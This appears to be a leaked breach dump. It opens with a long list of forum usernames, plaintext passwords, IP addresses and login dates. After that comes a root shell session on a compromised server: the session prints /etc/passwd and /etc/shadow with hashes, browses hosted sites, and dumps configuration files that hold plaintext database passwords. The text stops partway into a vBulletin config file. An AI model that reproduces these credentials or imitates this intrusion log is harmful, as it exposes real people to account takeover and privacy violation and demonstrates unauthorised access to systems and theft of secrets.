duden:galaxy:92.241.190.253:January 6, 2011, 9:35 pm
pill3:jackass123:212.117.172.231:January 5, 2011, 10:57 am
darkt0wn:marvin88:217.72.222.183:January 5, 2011, 8:06 pm
pyrodeath:b35ngf%:78.48.108.252:January 4, 2011, 12:55 pm
conviction:ichbingeil:92.241.190.253:January 3, 2011, 5:12 pm
blade1932:exaguqa5:92.241.190.253:January 3, 2011, 2:51 pm
hackbart2:twd2005:92.241.190.253:January 3, 2011, 10:22 am
juryrusski:jocklerhans:77.0.30.113:January 4, 2011, 8:47 pm
h1xx3r:trustno1:84.23.74.92:January 4, 2011, 9:04 pm
romulus89:192837465:80.123.42.135:January 3, 2011, 12:26 pm
deluxe0160:tomtom:92.228.173.201:January 7, 2011, 10:08 pm
hanshans123:hanshans:212.117.161.80:January 4, 2011, 12:43 am
sanisan:19n4schk4tz385:84.184.246.137:January 6, 2011, 12:15 am
pan1c:tigerpommes:92.241.190.253:January 5, 2011, 11:43 am
revar:puppetteer:92.241.165.69:January 4, 2011, 1:45 pm
epoepo:union84:92.241.190.253:January 4, 2011, 1:37 pm
offlinejack:Jodelhe1n:88.76.253.194:January 6, 2011, 8:57 pm
weedtwo:70301995:92.241.190.253:January 6, 2011, 5:18 pm
pann0:pannopasch0:79.198.146.182:January 6, 2011, 6:02 pm
eve1992:sacred:88.67.149.150:January 6, 2011, 10:03 am
hi:suPPort_masterPass88:212.117.165.197:January 3, 2011, 2:27 am
det0x:veronika:92.241.190.253:January 4, 2011, 3:19 pm
malakas2:internet:212.117.172.231:January 3, 2011, 5:34 am
fahne:23102007:78.50.87.217:January 4, 2011, 6:30 pm
alanka:159369:85.25.165.138:January 3, 2011, 9:50 am
pfanner:deinemudda:92.204.37.77:January 3, 2011, 12:53 pm
delphinko:aLLanKoy0:87.118.118.37:January 3, 2011, 8:20 pm
timetraveller:a3Pq71ryK1:79.229.42.88:January 7, 2011, 8:56 pm
logg23:1q2w3e4r5t6z7u8i:212.117.172.231:January 6, 2011, 4:49 pm
teppich:oog4weeT1acu:157.95.211.201:January 5, 2011, 12:49 am
andreas7411:123456789a:88.65.104.195:January 3, 2011, 10:23 pm
n3v10:uLeiDee7:212.117.172.231:January 4, 2011, 1:24 pm
frezorx:123456:92.231.125.179:January 4, 2011, 3:11 am
winkel72:berlin123:193.107.16.122:January 3, 2011, 9:34 pm
trinx:meli1993:92.241.190.253:January 4, 2011, 3:38 pm
c4sh1:mkz4kzj:80.121.99.73:January 7, 2011, 1:04 am
tais46:spoiler:69.172.133.146:January 3, 2011, 1:36 pm
whazun:daspw123:93.195.74.65:January 4, 2011, 11:44 am
anubis:xy200xyx:79.213.81.205:January 5, 2011, 8:16 pm
hugo21:901051901051:91.54.21.252:January 4, 2011, 12:14 pm
doomlord:oxford:91.51.166.181:January 3, 2011, 6:53 pm
sense88:pitbull:91.66.61.177:January 5, 2011, 7:11 am
heavygun:vpn24private:91.6.0.76:January 6, 2011, 10:26 am
tombi:Spiele:92.241.190.253:January 5, 2011, 1:08 pm
messias91:qaywsx:92.241.165.69:January 6, 2011, 4:29 pm
lryzx33:deutschlandhackedbysolme:91.121.82.175:January 4, 2011, 6:04 pm
dre4m90:chillen:188.104.227.204:January 5, 2011, 10:56 am
slumski:Harley23:109.193.150.182:January 3, 2011, 7:55 pm
theultralooser:921234:92.241.190.81:January 4, 2011, 8:35 pm
keystyle:firatfirat911:92.241.165.69:January 6, 2011, 7:33 pm
hund123456:hund123456:46.114.42.253:January 4, 2011, 9:56 pm
chiller1337:episodeone:92.241.190.253:January 5, 2011, 11:48 am
turboprinz:886988:93.211.71.197:January 5, 2011, 9:25 pm
silverfox:tamil94thenud*:93.218.92.119:January 4, 2011, 9:22 am
ikas2:k7gh8uc3ph:77.11.24.196:January 7, 2011, 12:33 am
mrmcfly:vpn2426112004:213.163.65.50:January 6, 2011, 4:53 pm
weedtaxi:dura2131:93.222.176.113:January 4, 2011, 8:17 pm
boxer1:daniel:188.193.12.78:January 5, 2011, 7:02 pm
newb1:hans1234:92.241.165.69:January 6, 2011, 2:56 pm
bichlord:michael12B:94.217.109.99:January 4, 2011, 5:52 pm
neonaut:derotter:212.117.161.80:January 3, 2011, 11:45 am
abs0lut:liberate012:92.241.165.69:January 3, 2011, 3:53 pm
thalia:stachnik:81.210.157.177:January 4, 2011, 12:12 pm
dudgeri:dude123:212.117.165.197:January 3, 2011, 10:56 am
arider:amp483:77.189.15.2:January 4, 2011, 8:54 pm
iodas1:hallo123:87.147.65.130:January 4, 2011, 8:42 pm
hans2000:yxcvbnm22:84.59.141.5:January 6, 2011, 12:05 am
jungeguter:toko29473:79.195.50.220:January 3, 2011, 4:40 pm
th3sh4dow:han2jo4cu:88.69.160.243:January 7, 2011, 7:26 pm
pwnny:faker123:77.176.234.57:January 4, 2011, 9:16 am
papo00:papo0815:84.119.53.9:January 5, 2011, 8:24 pm
thehen:duhurensohn:77.22.65.135:January 3, 2011, 11:21 pm
random9999:dfds67621dd9999:199.48.147.41:January 3, 2011, 7:03 pm
zorator:1q2w3e4r:91.121.72.221:January 3, 2011, 7:48 pm
xr34ct0r:spelock1909:212.117.163.21:January 3, 2011, 7:56 pm
deesr:timsilinsi:93.94.245.2:January 7, 2011, 6:19 pm
juliasutter:01305806:91.89.165.7:January 3, 2011, 5:22 pm
davidche:miezekatze:95.157.23.65:January 4, 2011, 10:37 pm
k1xy0:1qayxcv:92.75.20.99:January 5, 2011, 2:20 am
hyperion:sexysexy:212.117.172.231:January 3, 2011, 11:17 pm
emrano:go,schosch:92.241.165.69:January 3, 2011, 1:58 pm
razer111:hunter1:95.211.99.92:January 3, 2011, 11:30 am
asus123:intelatom:82.195.232.218:January 7, 2011, 4:41 pm
fruchtii:a1b2c3d4:87.118.118.37:January 3, 2011, 8:20 pm
mcott:123456:92.241.165.69:January 3, 2011, 1:38 pm
input:kingild:188.193.40.32:January 3, 2011, 6:15 pm
snowghost:7LKCFwm:78.53.114.62:January 5, 2011, 12:05 pm
fuckyou:fuckyou:212.117.177.110:January 6, 2011, 11:48 pm
snowmann:passwort:84.133.162.225:January 6, 2011, 7:43 am
nate23:hallo123:188.195.206.85:January 6, 2011, 4:10 am
smilenike:nippellecken:92.241.190.253:January 6, 2011, 10:33 pm
mastablasta:p4r4d153c1ty:62.141.39.222:January 3, 2011, 10:15 am
beware:er.,fs:93.213.21.9:January 3, 2011, 6:45 pm
5liter:Walter50:87.118.118.37:January 3, 2011, 4:49 am
d3struction:samson123:109.77.48.51:January 3, 2011, 4:48 pm
traden90:1234abcder:92.241.190.253:January 3, 2011, 5:46 pm
kaliber:kaliber44:79.218.97.68:January 6, 2011, 1:15 pm
styles:736286:212.117.172.231:January 3, 2011, 2:53 pm
thatslife:katze2:80.143.108.186:January 3, 2011, 11:49 pm
n8zm5gg:kfkfgkfg1:199.48.147.40:January 6, 2011, 12:58 pm
sparkasse:ficken:212.117.172.231:January 5, 2011, 2:17 am
p1r0x:timtimtim12:88.153.214.11:January 5, 2011, 1:31 pm
reideen:1kimmerle2:92.241.190.253:January 3, 2011, 10:03 am
shadowgamer:lumega34:84.19.169.236:January 6, 2011, 10:32 pm
kasanova:gentleman:92.241.190.253:January 4, 2011, 11:25 pm
anonymius:Zuu97ii83!!:78.55.211.145:January 7, 2011, 3:06 pm
thepu:asdf545:91.60.211.53:January 6, 2011, 4:26 pm
ixam123:chichi12345:79.240.150.109:January 4, 2011, 10:31 am
scanner1337:NL0AMGGG:93.221.58.122:January 3, 2011, 10:43 pm
xelni:kir123:92.241.190.253:January 6, 2011, 8:06 pm
nexus88:01230123:80.131.74.225:January 6, 2011, 2:10 am
meball:MeBall456:92.241.168.90:January 4, 2011, 7:39 pm
fuckdawn:former300:92.241.190.253:January 3, 2011, 12:06 pm
kdkdkd:abcabc123:85.177.152.182:January 4, 2011, 7:34 pm
nicvandebigdick:mezzomix:93.219.15.61:January 6, 2011, 3:52 am
alfalfa:57596300:85.176.120.193:January 3, 2011, 3:53 pm
kevin4ual:iloveu:92.241.190.253:January 4, 2011, 10:25 pm
simonsemmler:gangbang:92.78.143.171:January 3, 2011, 10:29 am
kuchen:asdasdasd:212.117.165.197:January 3, 2011, 2:21 am
peters:Bobchen2:77.181.106.195:January 3, 2011, 6:41 pm
anoymius:Zuu97ii83!!:78.55.211.145:January 7, 2011, 3:05 pm
pitbull69:9g3qW$23r$SZg8§$2GD3rg83:87.122.14.183:January 5, 2011, 8:45 pm
aschi2131:dura2131:93.222.176.113:January 4, 2011, 8:17 pm
testuser0:hurensohn:93.94.245.129:January 7, 2011, 4:20 am
makko:Lq=D)G92T2:79.228.238.216:January 3, 2011, 3:05 am
slash:busenbusen:82.195.232.218:January 4, 2011, 12:50 pm
thereplacer:fuckmyass:93.228.147.44:January 4, 2011, 6:48 pm
xxx3xxx4:derneger:92.241.190.253:January 5, 2011, 12:51 am
faxxer:hdgdla:90.134.58.200:January 5, 2011, 8:10 pm
magi007:imcool123:80.121.47.36:January 3, 2011, 2:47 pm
crack:novoline21:88.73.103.201:January 7, 2011, 12:55 am
bekanntmachungen:BEKANNTMACHUNGEN:89.204.137.175:January 3, 2011, 3:32 pm
ripit:gangbang123:212.117.172.231:January 4, 2011, 12:34 pm
mttsmtts:IgjTu0800zSv:93.134.103.213:January 3, 2011, 2:08 pm
dingdong:progamer:79.245.244.195:January 4, 2011, 12:13 pm
sa1nt:krankheit:91.7.92.101:January 5, 2011, 3:12 am
skilled:12345asdfg:94.23.114.4:January 4, 2011, 11:22 am
juden:test123:95.208.15.191:January 6, 2011, 12:13 pm
lolcat:i26nv1:79.204.36.137:January 3, 2011, 4:43 pm
docstrange:.denis.1203.:78.34.37.56:January 3, 2011, 3:56 pm
habadu:268413597:79.226.244.159:January 7, 2011, 12:05 am
loldielol:server1:91.55.112.62:January 5, 2011, 6:07 pm
kolumbus:infanterist2000:95.119.12.201:January 3, 2011, 8:31 pm
freefall:88866654:87.174.242.241:January 5, 2011, 10:27 am
lpboy:minkin:217.23.6.162:January 5, 2011, 8:10 pm
freaky123:05151942662:77.187.60.32:January 6, 2011, 12:32 am
kanye:Undertaker:92.241.165.69:January 5, 2011, 10:27 pm
codered:3081994:84.62.202.48:January 5, 2011, 4:21 pm
derboss:derboss:78.49.17.208:January 3, 2011, 8:52 pm
mandy:hallo123456:91.58.51.156:January 4, 2011, 3:58 pm
robmocdoc:881562:87.122.33.146:January 6, 2011, 3:07 pm
mcknad:masterxx1994:92.194.116.34:January 5, 2011, 6:45 pm
dre4m:gulliox90:188.104.236.248:January 4, 2011, 6:26 pm
matzeyooo:heheyo12345:212.117.172.231:January 6, 2011, 3:03 am
kerber0s:brennberg-1993:93.240.244.74:January 5, 2011, 5:43 pm
lenox26:250384:95.211.99.91:January 3, 2011, 6:41 pm
sidosido123:sidosido123:78.35.50.188:January 5, 2011, 1:53 am
mrsocke:fckgwrhqq2:77.189.137.162:January 4, 2011, 5:45 pm
schatten123:stinker:93.208.70.28:January 3, 2011, 6:56 pm
ev0lein:scheisripper:87.118.120.182:January 3, 2011, 5:53 pm
gweojk904trj:AOGWD55GMpUqCtB6Gsw2:92.241.190.253:January 4, 2011, 9:29 pm
wolfgang:florian90:85.178.145.194:January 3, 2011, 1:33 pm
cronic:67öänht53snjl:207.126.166.242:January 3, 2011, 10:04 pm
w333d:w333d1:92.241.168.90:January 3, 2011, 11:18 am
genetik10:s09101987:78.94.194.123:January 3, 2011, 2:19 pm
elektro:elektrisch1:77.12.190.94:January 3, 2011, 5:51 pm
amobios:welensitich9872582:89.149.242.16:January 3, 2011, 2:50 am
mablutze:tobias12:91.112.18.154:January 4, 2011, 8:43 pm
artist:yucatan1:82.198.80.81:January 4, 2011, 2:33 pm
dukeraider:muschi:188.193.200.182:January 3, 2011, 10:06 am
frankylo:Franky123456789*:95.211.13.145:January 3, 2011, 5:12 pm
dusa123:123456789:79.246.188.21:January 5, 2011, 1:14 am
asdfghjkl:carders231:84.161.40.27:January 5, 2011, 3:50 pm
# uname -a
Linux morphy 2.6.18-164.11.1.el5.028stab068.3 #1 SMP Wed Feb 17 15:22:30 MSK 2010 x86_64 GNU/Linux
# id
uid=0(root) gid=0(root)
# cat /etc/issue
Debian GNU/Linux 5.0 \n \l
# cat /etc/passwd /etc/shadow
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
sshd:x:101:65534::/var/run/sshd:/usr/sbin/nologin
mysql:x:102:104:MySQL Server,,,:/var/lib/mysql:/bin/false
Debian-exim:x:103:105::/var/spool/exim4:/bin/false
proftpd:x:104:65534::/var/run/proftpd:/bin/false
ftp:x:105:65534::/home/ftp:/bin/false
hdf:x:1000:1000::/home/hdf:/bin/sh
root:$1$SwmLmdGE$Unk7WkRpv7NF3O/0YSTCh/:14849:0:99999:7:::
daemon:*:14237:0:99999:7:::
bin:*:14237:0:99999:7:::
sys:*:14237:0:99999:7:::
sync:*:14237:0:99999:7:::
games:*:14237:0:99999:7:::
man:*:14237:0:99999:7:::
lp:*:14237:0:99999:7:::
mail:*:14237:0:99999:7:::
news:*:14237:0:99999:7:::
uucp:*:14237:0:99999:7:::
proxy:*:14237:0:99999:7:::
www-data:*:14237:0:99999:7:::
backup:*:14237:0:99999:7:::
list:*:14237:0:99999:7:::
irc:*:14237:0:99999:7:::
gnats:*:14237:0:99999:7:::
nobody:*:14237:0:99999:7:::
libuuid:!:14237:0:99999:7:::
sshd:*:14237:0:99999:7:::
mysql:!:14647:0:99999:7:::
Debian-exim:!:14647:0:99999:7:::
proftpd:!:14655:0:99999:7:::
ftp:$1$0LKSrIAD$rt1vOaeYC8GrKvVzI.T6s.:14662:0:99999:7:::
hdf:$1$RQkebH9N$LrPDCbeYn3.czmOpaM8nn.:14662:0:99999:7:::
# cd / && ls -la
total 168
drwxr-xr-x 21 root root 4096 Nov 18 23:11 .
drwxr-xr-x 21 root root 4096 Nov 18 23:11 ..
drwxr-xr-x 10 root root 4096 Feb 15 2010 SMF
lrwxrwxrwx 1 root root 39 Nov 13 13:09 aquota.group -> /proc/vz/vzaquota/0000001e/aquota.group
lrwxrwxrwx 1 root root 38 Nov 13 13:09 aquota.user -> /proc/vz/vzaquota/0000001e/aquota.user
-rwxr-xr-x 1 root root 122 Aug 21 17:30 backup.sh
drwxr-xr-x 2 root root 4096 May 13 2010 bin
drwxr-xr-x 2 root root 4096 Dec 4 2008 boot
drwxr-xr-x 4 root root 4096 Jan 7 06:25 dev
drwxr-xr-x 57 root root 4096 Nov 13 13:09 etc
drwxr-xr-x 4 root root 4096 Feb 15 2010 home
drwxr-xr-x 10 root root 4096 Feb 15 2010 lib
lrwxrwxrwx 1 root root 4 Mar 15 2010 lib64 -> /lib
drwxr-xr-x 2 root root 4096 Dec 24 2008 media
drwxr-xr-x 2 root root 4096 Dec 4 2008 mnt
drwxr-xr-x 2 root root 4096 Dec 24 2008 opt
dr-xr-xr-x 55 root root 0 Nov 13 13:09 proc
drwx------ 6 root root 4096 Jan 7 22:18 root
drwxr-xr-x 2 root root 4096 Feb 7 2010 sbin
drwxr-xr-x 2 root root 4096 Sep 16 2008 selinux
drwxr-xr-x 2 root root 4096 Dec 24 2008 srv
drwxr-xr-x 3 root root 0 Nov 13 13:09 sys
drwxrwxrwt 4 root root 4096 Jan 7 18:22 tmp
drwxr-xr-x 11 root root 4096 Dec 24 2008 usr
drwxr-xr-x 14 root root 4096 Mar 15 2010 var
-rwxr-xr-x 1 root root 83749 Sep 8 17:15 xgoogler
# cat backup.sh
#!/bin/bash
name=`date | sed -e "s/ /_/g"`
name=`echo "/${name}__vpn24org_backup.tgz"`
tar cfvz "$name" /root/ /var/www/
# cd /var/www && ls -la
total 40
drwxr-xr-x 9 root root 4096 Dec 28 02:33 .
drwxr-xr-x 14 root root 4096 Mar 15 2010 ..
drwxr-xr-x 2 root root 4096 Nov 15 17:35 a
drwxrwxrwx 3 root root 4096 Oct 13 23:26 dreckrebea12313
drwxrwxrwx 3 root root 4096 Apr 15 2010 dreckrebea12313123123131313131312313123
-rwxrwxrwx 1 root root 1 Sep 16 23:19 index.php
drwxr-xr-x 16 root root 4096 Oct 17 22:20 sadas.org
drwxrwxrwx 4 root root 4096 Oct 1 09:18 scenecms.org
drwxr-xr-x 3 root root 4096 Dec 13 22:18 vpn24.org
# cd dreckrebea12313 && ls -la
total 20
drwxrwxrwx 3 root root 4096 Oct 13 23:26 .
drwxr-xr-x 9 root root 4096 Dec 28 02:33 ..
-rw-r--r-- 1 root root 132 Oct 13 23:15 adsads.rar
-rw-r--r-- 1 root root 35 Mar 15 2010 index.php
drwxrwxrwx 3 root root 4096 Jan 7 22:20 web
# cd web && ls -la
total 40
drwxrwxrwx 3 root root 4096 Jan 7 22:20 .
drwxrwxrwx 3 root root 4096 Oct 13 23:26 ..
drwsrwsrwt 9 root root 4096 Apr 22 2010 board
-rwsrwsrwt 1 root root 1033 Apr 19 2010 index.php #+s root? Holy crap!
-rw-r--r-- 1 root root 0 Apr 22 2010 ipinfo.html
-rw-r--r-- 1 root root 23564 Apr 19 2010 sc.png
# cd board && ls -la
total 228
drwsrwsrwt 9 root root 4096 Apr 22 2010 .
drwxrwxrwx 3 root root 4096 Jan 7 22:20 ..
drwxrwxrwx 3 root root 4096 Apr 22 2010 Packages
-rw-r--r-- 1 root root 74243 Feb 14 2010 SSI.php
-rwxrwxrwx 1 root root 3998 Apr 22 2010 Settings.php
-rwxrwxrwx 1 root root 3998 Apr 22 2010 Settings_bak.php
drwxrwxrwx 5 root root 4096 Apr 22 2010 Smileys
drwxr-sr-x 2 root root 4096 Apr 22 2010 Sources
drwxrwxrwx 8 root root 4096 Apr 22 2010 Themes
-rwxrwxrwx 1 root root 3343 Jun 5 2005 agreement.txt
drwxrwxrwx 2 root root 4096 Apr 24 2010 attachments
drwxrwxrwx 4 root root 4096 Apr 22 2010 avatars
drwxrwxrwx 2 root root 12288 Dec 28 02:20 cache
-rw-r--r-- 1 root root 15347 Feb 14 2010 index.php
-rw-r--r-- 1 root root 3975 Jan 6 2009 license.txt
-rw-r--r-- 1 root root 2650 Feb 23 2010 news_readme.html
-rw-r--r-- 1 root root 12350 Feb 23 2010 readme.html
-rw-r--r-- 1 root root 30030 Feb 14 2010 ssi_examples.php
-rw-r--r-- 1 root root 5909 Jan 1 2010 ssi_examples.shtml
-rw-r--r-- 1 root root 10147 Feb 14 2010 subscriptions.php
# cat Settings.php
<?php
/**********************************************************************************
* Settings.php *
***********************************************************************************
* SMF: Simple Machines Forum *
* Open-Source Project Inspired by Zef Hemel (zef@zefhemel.com) *
* =============================================================================== *
* Software Version: SMF 2.0 RC3 *
* Software by: Simple Machines (http://www.simplemachines.org) *
* Copyright 2006-2010 by: Simple Machines LLC (http://www.simplemachines.org) *
* 2001-2006 by: Lewis Media (http://www.lewismedia.com) *
* Support, News, Updates at: http://www.simplemachines.org *
***********************************************************************************
* This program is free software; you may redistribute it and/or modify it under *
* the terms of the provided license as published by Simple Machines LLC. *
* *
* This program is distributed in the hope that it is and will be useful, but *
* WITHOUT ANY WARRANTIES; without even any implied warranty of MERCHANTABILITY *
* or FITNESS FOR A PARTICULAR PURPOSE. *
* *
* See the "license.txt" file for details of the Simple Machines license. *
* The latest version can always be found at http://www.simplemachines.org. *
**********************************************************************************/
########## Maintenance ##########
# Note: If $maintenance is set to 2, the forum will be unusable! Change it to 0 to fix it.
$maintenance = 0; # Set to 1 to enable Maintenance Mode, 2 to make the forum untouchable. (you'll have to make it 0 again manually!)
$mtitle = 'Maintenance Mode'; # Title for the Maintenance Mode message.
$mmessage = 'Okay faithful users...we\'re attempting to restore an older backup of the database...news will be posted once we\'re back!'; # Description of why the forum is in maintenance mode.
########## Forum Info ##########
$mbname = 'SceneCrypt'; # The name of your forum.
$language = 'english'; # The default language file set for the forum.
$boardurl = 'http://scenecrypt.org/board'; # URL to your forum's folder. (without the trailing /!)
$webmaster_email = 'admin@admin.de'; # Email address to send emails from. (like noreply@yourdomain.com.)
$cookiename = 'SMFCookie410'; # Name of the cookie to set for authentication.
########## Database Info ##########
$db_type = 'mysql';
$db_server = 'localhost';
$db_name = 'smf13';
$db_user = 'root';
$db_passwd = 'QkZorIZZC5e';
$ssi_db_user = '';
$ssi_db_passwd = '';
$db_prefix = 'smf13_';
$db_persist = 0;
$db_error_send = 1;
########## Directories/Files ##########
# Note: These directories do not have to be changed unless you move things.
$boarddir = '/var/www/scenecrypt.org/web/board'; # The absolute path to the forum's folder. (not just '.'!)
$sourcedir = '/var/www/scenecrypt.org/web/board/Sources'; # Path to the Sources directory.
$cachedir = '/var/www/scenecrypt.org/web/board/cache'; # Path to the cache directory.
########## Error-Catching ##########
# Note: You shouldn't touch these settings.
$db_last_error = 0;
# Make sure the paths are correct... at least try to fix them.
if (!file_exists($boarddir) && file_exists(dirname(__FILE__) . '/agreement.txt'))
$boarddir = dirname(__FILE__);
if (!file_exists($sourcedir) && file_exists($boarddir . '/Sources'))
$sourcedir = $boarddir . '/Sources';
if (!file_exists($cachedir) && file_exists($boarddir . '/cache'))
$cachedir = $boarddir . '/cache';
$db_character_set = 'utf8';
# cd /var/www/dreckrebea12313123123131313131312313123/ && ls -la
total 16
drwxrwxrwx 3 root root 4096 Apr 15 2010 .
drwxr-xr-x 9 root root 4096 Dec 28 02:33 ..
-rw-r--r-- 1 root root 35 Mar 15 2010 index.php
drwxrwxrwx 4 root root 4096 Apr 15 2010 web
# cd web && ls -la
total 68
drwxrwxrwx 4 root root 4096 Apr 15 2010 .
drwxrwxrwx 3 root root 4096 Apr 15 2010 ..
-rwxrwxrwx 1 root root 983 Mar 15 2010 conf.php
drwxrwxrwx 3 root root 4096 May 11 2010 images
-rw-r--r-- 1 root root 42787 Apr 15 2010 index.php
-rw-r--r-- 1 root root 1 Apr 15 2010 index__.php
drwxrwxrwx 3 root root 4096 Mar 15 2010 psc
# cat conf.php
<?php
define(_SceneCMS_footer, "SceneCMS v1.0");
define(_SceneCMS_admin, "mimimi");
define(_SceneCMS_Host, "localhost");
define(_SceneCMS_Username, "qstore");
define(_SceneCMS_Password, "4cFRwaLnt2qS2QSp");
define(_SceneCMS_Database, "qstore");
mysql_connect(_SceneCMS_Host,_SceneCMS_Username,_SceneCMS_Password);
mysql_select_db(_SceneCMS_Database);
function strFilter($text) {
return (string)htmlentities($text);
}
function sql_str_escape($str) {
if(get_magic_quotes_gpc())
stripslashes($str);
return mysql_real_escape_string($str);
}
function Logout() {
$_SESSION['cms_name'] = "";
$_SESSION['cms_validate'] = "";
session_destroy();
}
function CheckLogin($killtrue) {
if ($_SESSION['cms_name'] == "" or $_SESSION['cms_validate'] == "") {
if($killtrue == 1 or $killtrue == "1") {
echo '
<script>
window.location.href = "?";
</script>
';
die("No Access");
exit();
}
return "0";
} else {
return "1";
}
}
?>
# tar cvjf /tmp/psc.tar.bz2 psc/
psc/
psc/data/
psc/data/money-coin.png
psc/data/Webbrowser.class.php
psc/data/bg_code.jpg
psc/data/bg.jpg
psc/data/bg_lock.jpg
psc/data/bg_captcha.jpg
psc/index.html
psc/api.php
psc/cookie.txt
# cd /var/www/sadas.org/ && ls -la
total 5632
drwxr-xr-x 16 root root 4096 Oct 17 22:20 .
drwxr-xr-x 9 root root 4096 Dec 28 02:33 ..
-rw-r--r-- 1 root root 19565 Apr 5 2010 LICENSE
drwxr-xr-x 3 root root 4096 Apr 5 2010 admincp
-rw-r--r-- 1 root root 23760 Apr 5 2010 ajax.php
-rw-r--r-- 1 root root 75427 Apr 5 2010 album.php
-rw-r--r-- 1 root root 17051 Apr 5 2010 announcement.php
drwxr-xr-x 2 root root 4096 Apr 5 2010 archive
-rw-r--r-- 1 root root 18225 Apr 5 2010 attachment.php
-rw-r--r-- 1 root root 75242 Apr 5 2010 calendar.php
-rw-r--r-- 1 root root 58135 Apr 5 2010 checksums.md5
-rw-r--r-- 1 root root 43 Apr 5 2010 clear.gif
drwxr-xr-x 4 root root 4096 Apr 5 2010 clientscript
-rw-r--r-- 1 root root 15277 Apr 5 2010 converse.php
drwxr-xr-x 7 root root 4096 Apr 5 2010 cpstyles
-rw-r--r-- 1 root root 3233 Apr 5 2010 cron.php
drwxr-xr-x 3 root root 4096 Apr 5 2010 customavatars
drwxr-xr-x 3 root root 4096 Apr 5 2010 customgroupicons
drwxr-xr-x 2 root root 4096 Apr 5 2010 customprofilepics
-rw-r--r-- 1 root root 3485 Apr 5 2010 dgt_released.nfo
-rw-r--r-- 1 root root 47671 Apr 5 2010 editpost.php
-rw-r--r-- 1 root root 29410 Apr 5 2010 external.php
-rw-r--r-- 1 root root 9702 Apr 5 2010 faq.php
-rw-r--r-- 1 root root 10134 Apr 5 2010 favicon.ico
-rw-r--r-- 1 root root 521 Apr 5 2010 file_id.diz
-rw-r--r-- 1 root root 35900 Apr 5 2010 forumdisplay.php
-rw-r--r-- 1 root root 39747 Apr 5 2010 global.php
-rw-r--r-- 1 root root 138104 Apr 5 2010 group.php
-rw-r--r-- 1 root root 24835 Apr 5 2010 group_inlinemod.php
-rw-r--r-- 1 root root 10747 Apr 5 2010 groupsubscription.php
-rw-r--r-- 1 root root 8963 Apr 5 2010 image.php
drwxr-xr-x 16 root root 4096 Apr 5 2010 images
drwxr-xr-x 6 root root 12288 May 22 2010 includes
-rw-r--r-- 1 root root 19508 Apr 5 2010 index.php
-rw-r--r-- 1 root root 43844 Apr 5 2010 infraction.php
-rw-r--r-- 1 root root 182837 Apr 5 2010 inlinemod.php
drwxr-xr-x 2 root root 4096 May 22 2010 install
-rw-r--r-- 1 root root 10258 Apr 5 2010 joinrequests.php
-rw-r--r-- 1 root root 10138 Apr 5 2010 login.php
-rw-r--r-- 1 root root 16980 Apr 5 2010 member.php
-rw-r--r-- 1 root root 15847 Apr 5 2010 member_inlinemod.php
-rw-r--r-- 1 root root 35817 Apr 5 2010 memberlist.php
-rw-r--r-- 1 root root 23782 Apr 5 2010 misc.php
drwxr-xr-x 2 root root 4096 Apr 5 2010 modcp
-rw-r--r-- 1 root root 63240 Apr 5 2010 moderation.php
-rw-r--r-- 1 root root 6672 Apr 5 2010 moderator.php
-rw-r--r-- 1 root root 18392 Apr 5 2010 newattachment.php
-rw-r--r-- 1 root root 37017 Apr 5 2010 newreply.php
-rw-r--r-- 1 root root 18827 Apr 5 2010 newthread.php
-rw-r--r-- 1 root root 19520 Apr 5 2010 online.php
-rw-r--r-- 1 root root 7612 Apr 5 2010 payment_gateway.php
-rw-r--r-- 1 root root 11826 Apr 5 2010 payments.php
-rw-r--r-- 1 root root 7805 Apr 5 2010 picture.php
-rw-r--r-- 1 root root 21956 Apr 5 2010 picture_inlinemod.php
-rw-r--r-- 1 root root 25223 Apr 5 2010 picturecomment.php
-rw-r--r-- 1 root root 27328 Apr 5 2010 poll.php
-rw-r--r-- 1 root root 9428 Apr 5 2010 posthistory.php
-rw-r--r-- 1 root root 74284 Apr 5 2010 postings.php
-rw-r--r-- 1 root root 6509 Apr 5 2010 printthread.php
-rw-r--r-- 1 root root 70656 Apr 5 2010 private.php
-rw-r--r-- 1 root root 152244 Apr 5 2010 profile.php
-rw-r--r-- 1 root root 39667 Apr 5 2010 register.php
-rw-r--r-- 1 root root 5603 Apr 5 2010 report.php
-rw-r--r-- 1 root root 13635 Apr 5 2010 reputation.php
-rw-r--r-- 1 root root 124633 Apr 5 2010 search.php
-rw-r--r-- 1 root root 20862 Apr 5 2010 sendmessage.php
-rw-r--r-- 1 root root 9925 Apr 5 2010 showgroups.php
-rw-r--r-- 1 root root 12304 Apr 5 2010 showpost.php
-rw-r--r-- 1 root root 75611 Apr 5 2010 showthread.php
drwxr-xr-x 2 root root 4096 Apr 5 2010 signaturepics
-rw-r--r-- 1 root root 32792 Apr 5 2010 subscription.php
-rw-r--r-- 1 root root 13281 Apr 5 2010 tags.php
-rw-r--r-- 1 root root 8608 Apr 5 2010 threadrate.php
-rw-r--r-- 1 root root 12331 Apr 5 2010 threadtag.php
drwxr-xr-x 2 root root 4096 May 22 2010 upload
-rw-r--r-- 1 root root 34424 Apr 5 2010 usercp.php
-rw-r--r-- 1 root root 19011 Apr 5 2010 usernote.php
-rw-r--r-- 1 root root 29490 Apr 5 2010 validator.php
-rw-r--r-- 1 root root 3417514 May 22 2010 vb38.rar
-rw-r--r-- 1 root root 27293 Apr 5 2010 visitormessage.php
drwxr-xr-x 2 root root 4096 May 22 2010 web
# cat includes/config.php
<?php
/*======================================================================*\
|| #################################################################### ||
|| # vBulletin 3.8.5
|| # ---------------------------------------------------------------- # ||
|| # All PHP code in this file is ?2000-2010 Jelsoft Enterprises Ltd. # ||
|| # This file may not be redistributed in whole or significant part. # ||
|| # ---------------- VBULLETIN IS NOT FREE SOFTWARE ---------------- # ||
|| # http://www.vbulletin.com | http://www.vbulletin.com/license.html # ||
